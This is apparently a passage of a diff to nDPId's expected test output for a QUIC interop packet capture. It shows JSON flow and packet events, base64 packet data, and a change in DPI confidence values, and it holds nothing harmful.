ZINxypwBzbjs9d0tlnjJXwUYRy9QmD0slTxEyxrjpBtheiCMc4Cn\/6vmy83GYsYqAPaHjYm5Lm9bkw2mDchmuHIE33cyYUc9fwTe495DLrhWVEzAWbCKPviregmjAsH4m0iA+u4W5k31m1AmJpuBDrgjPUcXL4i82zhjeL+h12K6gteHYqwX7EOPhQ+bRm3SKhW2iyandNBDGKMy2kYZB+kl96lTKXHy42WcNsjGKMfUP9vZVhz0rZo8wSdI7knLcO6jiMKqrsnoCOre5s3EnkzOjTGJOpVTbDAlyOIrVY0\/12bwxq500zdJS7Tqi8Od4Mv0jxABBtbfjE3S4PoXY6OYUNPBVH\/C3Jt3XbMm8PyemuOM8gg2u\/LJT60w1swKGZ4faRilJPXx5ej4jCKtVtArI1E1I5haUgoGSnYETrYiEWQ=="} -00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434582,"flow_last_seen":1603816434582,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434582,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":51887,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.seemann.io","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434582,"flow_last_seen":1603816434582,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434582,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":51887,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.seemann.io","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434584,"flow_last_seen":1603816434584,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434584,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":43475,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1603816434584,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434584,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAXS5AAEARruTAqAGAEr1U9anTEVEE7CkgygoKCgoI3rE9GgKLpyEAAETS2D6FRkK87MNUIcKb45nDQXK7RIhN5jovTQDmFSK2M6QiVZpJOUYoJlkltsOnfd\/1F6U4IQkpFe+m1uV4F6oBz4RBkNPAAuUUBMdDtca4r1A9a73h9DF0dBCYcXkZBvDtL9wCuog66vADNiZMmDEEKyoT8ED6s88IFRXJtbENfR6cs0sHtB4WxRNwLE2yoS5jEYyQtDPhxoDW6y1RUStChGv8HnP3XMM2t\/jLHE+oLZ20Uei8+UFfPk0e8A5VrXwIo9k4jCJsPG1mMTDbv0YDgoPfvTmJTVTIw4QonxYS\/rk7SadZEeONmPaR6TtoWts1FnzUvtWOpV+5Dad83KsfG90X\/CIt\/vwYmyVKvj4VgDM6Pr4H+Uc\/bvz0KjdGW3xm9YMUTlsbI5ol2Pfvu52tXEEWdRjKK8g6DND8ZlC7aMVgSCICn0NKoRloC6NcE8Rw5LJBhOhPXDDbCt20z0FHuqxH9Vx85YXc89Y9JZS\/xEo6rLepUNAZyK4VZC62QFOzsGL6Lx8wSrVduZKsiJBZ4c3ThpGGJ+vaMWABr4\/cWq95Q7ZzLSuvRsXOk+j1He6DsUvm3J+RmjmrwYFgt\/M4CICjBS0Fm10ECgKhrWwd3J2E54DK4DKQ3EUyd3bjdTDHFVk2++CCDGOxGq+7NMa3RFtYVeMobAS4ZjFwkv3BS0m0bobUjHhoVD1GCqa6cx2A4+lBUsOhUXvuodo95jKqOaTXUqsvEaXzN3L7b43PXMpLAq+LaQ7Vzd1FgcpeaZ20BnyGL81mPGhvhcnQeusPeZeeqS6zV1B7OHOYc65wKxzUbYn1EC28EGygmnjZWc0jy2pYGDmTX7nQGQSjnYxGUcUGQPhaCfOeI1ggQvzjjmgpCyBH7XX3wXAV\/IVyilSo0omRqkl\/bMhBxO5UlcQB3HAXvh7\/CW9oHeT1wKQ3fB\/HEa9yU72ZB7d6KVeVKjZq17j4ybQ\/1ggtHYGp2pcGrXZzRwYjOkAZ0Opiy89watoyLGRmGLgTFsDl3McdaMNDx+9v81zsdMOm7BtAMYT6tRwsjrRofdkZ0fVa+YwJIBwtAhT8ajDn7UeBBPGRi94tJDcKF6j4s8my9KviboSu2mxdTOGQO7LtRIaKMRxlUFMtCi42onUa0qPaP+\/X0ttI9DVmM3lXTbZz7zAPwnKTDbrTvlsXFf+fb69MdPyK+0ZKLVzYuN6Rage1Taxjdnuj4OAM\/zUBa3m3soYXUIDBjkGYI3RorjKOgin\/VL4DsoJChrJPR888h8Xk\/IbBDawgJWzXLfoKqwSjYoA5BJLar1\/dem1\/5+HxdBDknyqV+PU2P2vYp8hNcb6mnUzN837UGUuA4NsueZUnc6zYaSL6DRRgrjjKhF6Tz\/MDuOVmRVnM76clbdBfnFUZ6P1n46WbYwkc\/I8+JIV6\/IqS+DjXGRm3N0QevTA6r\/68gEOcX6irDxw4FjiTMIU+OFUnGh6WsbCgi8K5SeV1kRKBmc\/TSum+LmX9s3PKC6cu25aK8beNwOxmv\/gY54CIgRosYlyDeYbWJdPZtKjt0TZLq4wV7HN+8OtqvsSQLBG9tsFDIGXLerkJmoKCBPMmTv62Jjm9BtEc0eZuVqDPUnoU+YqxHdkhj9bAhq0W1dwrlRBuS8N9Rw=="} -01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434584,"flow_last_seen":1603816434584,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434584,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":43475,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"fb.mvfst.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434584,"flow_last_seen":1603816434584,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434584,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":43475,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"fb.mvfst.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434585,"flow_last_seen":1603816434585,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434585,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":49151,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1603816434585,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434585,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAgstAAEARnBLAqAGAhfLO9L\/\/EVEE7M7UxwoKCgoIFbSGVwPjC1AAAETSjkROzIIp8CK\/caOuFZYAfK1aOEqO4JwTw9D7z+uUbIBTx\/XH4yTcUJ1GJ5nL+Agpz8kkGqy7oh35jkjpRQSyzT2NyzB2NTBiZzOgYyNio+jROASCrTsvFc3Z7POk+A3z6nh\/zFa0LHBvwlp+McgWNFYpnLkD+S13ugMu2uizXqCPOTgA3G6sIsESNefWZzgDU6TE0Fie6rZUHLpsGk6\/rXINEPxgL\/9wq34N4qUhpvbCKjEq66pMlprpty+OzFobGyzV+ZfKcjfk9heS8\/Ktv46aaw96hlXnUfPZHMbA+CWsmthusRBP+K8uIWlnTbdNz9Rfn\/rIR1WmSXPxGkt7FVroGfbPWNtXVz4++NucTI\/gHddPWrZHVTxmD4eDZ+gEpCk9qXs4vIQRkuhhDT7KtsO5OQlx0LGSyxQmka20y1oOk5gC3euqSWQvmM8esR3UL4VI1v9ztMr8LjMn0OiMu95CEowBICOANwFprI0fObMHGsulwe5nvslar15BxrnmzEPNZiHa\/I2lrJGnez3fp4uBPMNgkQPccWwS7tSftVUqukoIkaMMDDugrSYQ99AP2nblRffqf3JA4AsmJuPW0X7qs\/Byp3V6ceyok7YXbgcjlYcvQaIYY\/lxFpek3Nn6KNssLG1fs0ok3z4gezAdPzCDxhvWVe5HYAr1IFeRj3nq\/RPsEA6C4W+4l7Yb2Q+t\/rGxDvAreWu6lw7r0fJV+s3RVQJy+tEW28PRfLsTsQmCiDcS3zHb84scMnkwv5bvftQiTHPxbXfuzIT64fpwltpQEBi3fJ3wBTXCGnFFnw7Nsf4\/JCCbl8lJDqInzgCs+\/Y\/bv7BFYE5WwvyQhhVAkY54ihB2e1U2DYdn7Zqiluxkz6gTqo9t0goC9XZwhqTLhcNfKD0XB23eFaY3KoEPWuPes1Ne6OhOBQfjbGBHAapLo8KpRyV6yba5+B3oKegQAyfeyrNROon4pshqrtlR67NkthaTNhbaMWzCPQYQ69NKAHv4GZAavtCgzoyw0xfFk74LvRxAfWd5OtjPWFSoU9lQ+1mdU\/bOKC6O4VAOilWKe6QbrEStrVui1p\/aQNyqAYvjHwGeocuQw5Apru2zL4CCg9jzkD4KS\/jN+UCk46yLdkn5Ubz2Y\/4Tqj5walihAnanr74XvviJcs00s6SbGZQRIQnGnA5QboJY2HvdZJa5px5WoWlaAtRNSjKOb8VqvcsOTB2gm51ybY2P8hwH3e8MTnT6NSTQUYxd9MKuGbtBlaY4If+PpqrBCmLTLCDHV17kk1VWuNwxmBudJ5goE4YQONWMQUK3S3Ul6LG6ZXlHy88HhO5x8L0R8jS+WOFGP6zSoYvhB8OXq99sB9qjRABZmtgMm6tlllhZ6+KyV6yl0udz2oNhS2Hk09RxStU8\/YuG1qMWFdf1q4PbwgPZ\/SEU8YEQ\/gK\/b3lzjqtkntdDToIJ29938u4+Oea0Z6Ovn9IPTGyjlhkBTrCdjCsinWeEj2Cr6kqLjEOPd09mljIQf3aovLDbm2AUoZWafgLqoeW0JnEY2b\/2gwE5NpGc2iu38L1nWR8EcAN\/w88hux95l3UfaGjHKlj3FFO34BXqnrmch2I8X4qZ\/Xqx0WznIwTUj71m8E95Pb58bFksDsyDw=="} -01000{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434585,"flow_last_seen":1603816434585,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434585,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":49151,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h2o.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01000{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434585,"flow_last_seen":1603816434585,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434585,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":49151,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h2o.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00648{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434586,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":39945,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1603816434586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434586,"pkt":"pJGxgjQ5PKn0qB\/sht1gDM4pBNgRQCABCwcKydWupNP+R2kegH0qBdAYDOmBAM0q4v2zvsWrnAkRUQTYkaDFCgoKCghrDAA38OgwkgAARL4V7fWqJD97ugGiMo3hEbsI2+6\/SpwaiwHfJYhBwe8nlBeC2wTuSe5rZV7amDM9N\/ui5SRbMnMa4jgRbgv6T7FxocLh78\/\/47xNpYbQ5OnVlvNw6YvcG6V3D9lglGS7SGlN5I9EKjcJ6eJNC\/yHA+fna1KNRS6W4dCmPZfMeeRKhPbnKLP\/zD\/hQ9u8WpY9sQzK7DxdC06QgW5OFPLciatcrURwr8u743b7gflxyjWj2XMTb8+OZThPj0RJwH3mLn1aP+ys3uq61x1VUHQw18JbP+jOhfjr5+O\/DOmynEaj9yDtlT8pCQmkvZjKW+qGdVHgPAjMhELPJZM+CKVtQWm40oviKQmQrLioe2xR08VjBsCQ33vDOtlEGlAArjadOrMBFc2+XUcBiGRd32aXmUR89tCzI1B+GouNtIblHFiotduRGiNABGg+3Qc29eltQIl3PdSG\/mv6xeCbqRlmFNb1hZDT0EPrntyPIWcXzd7I6R9yH\/OcuERuArM+R4UUu7HVGq3VOIpyJl\/8vVA0PxAitJPE3y7Z8KBR5Uk9ypmv2LBTFbQqleqxK9NsAkl7SzAMl4vTV6UfLWkE4v+lvbSNEQ+7\/h05HZdmM+ow0IuI\/BgPpOsDVtV1aa5VzDkkk9VWQdMUFySvpiE3OHVn9TUuuM9z5aYjx1qv5iZjNaxwGxQ2y+LC+sSOXYRfbtK34ZuCzCSfwzTrrGUTngeMOBfoZ0Xj\/ocEK17WUvslg9MAtjR1Gt3CBgVFOL0OMDBH4AMY+AhGxe0SgGsm9XvIgfhBa9vjDgpW2bJ0dEWPHP5qrAgfuKrrDizOESiLnlVMmMFXOgizTrGewuj0m\/x9ORClQAI0lFK+zVYRJsDUDjl8s8kMpL4rhzj3idhtdVWCdH8wFTr8WuyJ56hOdItfnc01ZNE8WReW4m6xZikAeggNMeWiKtQq+jfhT6qhFmDdif53uwIz3lMDO2crL14B2fVYDgPMUN05glordSj1PZRZS0OPJgjhG1Hs262PpADEzmqa1d8PWOn7489KV\/wKRhTXTO8HK3lkd68JU4rMEIXRiF4qH\/eZSGMgWSgdLEk9Ag7IV4F4aQpdDeOkRKGB\/bEnoIBfiBauwiLbdlgdD\/c47VmgQoRcvQk5GsUx0U0+wFCL\/ZkzcmI3DYCHTfNkG2aEAA+xvCWzWICgkMC5+W19MUzCoMuKizeg1ma9CdQgrL4sjg3iELKoYVCphaaL\/n3OYJYWvTTKTbT6OOq7SWtEDlUmidq13+s7Sl3Yj+afjtbetPkC\/8CAhhTxZQSPMQ1Ni1uSCgMYa8Y4VkddiZbjqAaSZzKfWrctUQrKqIadtSGNHtMQqjpEIWiMo8o\/UgBofbs5Kg3B8jC+JxO7Ld\/FGGhuabdGKUSF\/ZtUgLnPcGEW5kKFktT1D6fxQMfKzarearkPRdC9eF2UogCyGsrOxI\/GFB3vpOggGgWFiIo78PmOU0twqHHZC0t0srjfWKBrf\/fzPkN55ufN73EVurA0pU1TeEWhtid5II3hk9ekWAYMe+fHTtyW461m2tjhK9mczMG6wWszN2qKL3rLagh+IX9s8CJGYkrmfOhgpW1AdBPHq6OvvD7s1\/95DBb3hQ=="} -01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434586,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":39945,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434586,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":39945,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00643{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434586,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":39624,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1603816434586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434586,"pkt":"pJGxgjQ5PKn0qB\/sht1gAlC2BNgRQCABCwcKydWupNP+R2kegH0gARnwAAUMIVQAAf\/+MzuWmsgBuwTYjDrICgoKCgjzgkejWnQFTwAARL7AEcGzrGiFbLDVVitPMjpX6T6us8klH0LZdsk33gK4kca790hWc9lEqiHw2zuG3cvmTx4edwCefhx9uVFQHbwCX7OdVaAKALQsTDf2esUnZnHqAVwqfHs0alGH87lg8LOQYMLCyJ5o4796Hi54oLNHvp1iBOlawAP1QQwkOrhTac81Z\/3lqw5txy4fqI2ulRUcc8HMVbAvriqgCRBafLPQysmCOVqjinACocPdi0ZP1pUx0qn0+kKcTF+7gFuANdSw5ZrXDF5v6YKUxiJ6vSw8Hy7vrpHpUiN+5fprlESKduOvuve2w8S0Rn1T\/QCLnqgsvW4zVX2obPqKMBoLM0FaRFm0tupv3jD2Bo6wMhEP7UVS6LQVCbX\/F5hZ42FQPL174ha0Yjp7fot\/ow92n0s8sDYpXdyVzzUtmI9H59mtClZBkXIm4hCy5YwKUBE5Htf0HL6v7tX\/C56I4bHgjD1kXDqKwEusnGxfxLkbm5cB84\/UPVfX54l5AlcUWrKt\/sWPHXza3lrXmjl3iKLayJGvSvxgwAyLdj+1dAf2mHjT3T9ZeLg4TPyNz17SLyKDROZpbuZtC2zCbnl+NoReuXxIIu553FeA7K1Fq06E+HYHhMw9+fWseAQfiQhoIBqlHGL+6zzFwJx8LqsX2kF9IlqJJkfGxh2dCK8J4o5uVhtnU3J2xj0GDXLtBrNSCk7DDd67hChkNkJ\/zra77RGExcKdo9KUDUUYykOLFAbdNAsP9djZJfE2+FIW26Q0ve6PvxjGma3cI1DAbfodw3x7gmpMenGXbAesto3GigfY8Dqk5DyVN2us4Q8jxijjrwa1uGb6WCWFIbPGsRxa2EtoUIAHsP\/pagnvZR1tK2myhxOFZczPeNlpxk1o3SOIXdZrMfCNqe8UgV89dZHklMi3hgQCyoO5n2p9n2UNtckDsulzdkWAkN7ELjfKSw3xLKX8QYYwRNZkrnslYV\/gNUyPn\/DAHxcrYsCggnVPpcMfjQHnjiySyU7agWUfxfnrK5KR0Hz1uxcerQD9r2dHrU5GwRgAJqiERgTrm61j0\/9g6EnJzaJxnY2YL\/8StPHOT4TbswEzgPxmOMhq3B3NyVJmRRvGKyoWosF33+eeRJZtqDmGzt7Y\/QslvmPGsoNyGhIfWD4qHCWm8JN2zWi8NKuiyFpgsC\/gseqp2COjYeHLzTsHE8Lb24ziOBbxiS8nhlUeyvkTXTnPgtpZev\/ducm+wW0A+YY2gp+9vovT+lMYKPoIIeW89qmvsTK34QrhAHBV8Gdi7IG6oE67NdkIrFleG4EtBQyuNTVG\/Hni6IlsFEhmcMOi9gtqRQF0bots7U2r2su6TX5cs\/tWsUtfcKDq01p1Oi+UeZRz\/V+lKX5GfCRE\/JIN8wqGMoYFzwTiwgXQFJuV\/tc8U4uoRYgnau5MAB9+BYOU44CnqwsIla5AaVfMisOMnVZhANbfOkDwWOMuBcFcvM4iPJEdLrpJXtiL7lozz\/DNjHrb6qIdiWBMUyCod\/1w5XY81jvBVw6EPdS52X\/61VYwnM6etnlrj2efLI9zOedaqcKmUUuU5hMhqfCCW6Ds62KH8dV8j+mD8L1skbcaPGiQBq8L77krzCDv+w=="} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434586,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":39624,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.tech","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434586,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":39624,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.tech","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 